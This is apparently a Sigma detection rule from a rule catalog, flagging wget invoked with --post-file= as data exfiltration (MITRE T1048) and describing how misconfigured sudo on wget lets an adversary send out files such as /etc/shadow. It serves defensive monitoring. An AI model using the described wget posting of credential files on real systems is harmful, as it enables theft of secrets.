Techniques
Sample rules
Data Exfiltration with Wget
- source: sigma
- technicques:
- t1048
- t1048.003
Description
Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
Detection logic
condition: selection
selection:
a0: wget
a1|startswith: --post-file=
type: EXECVE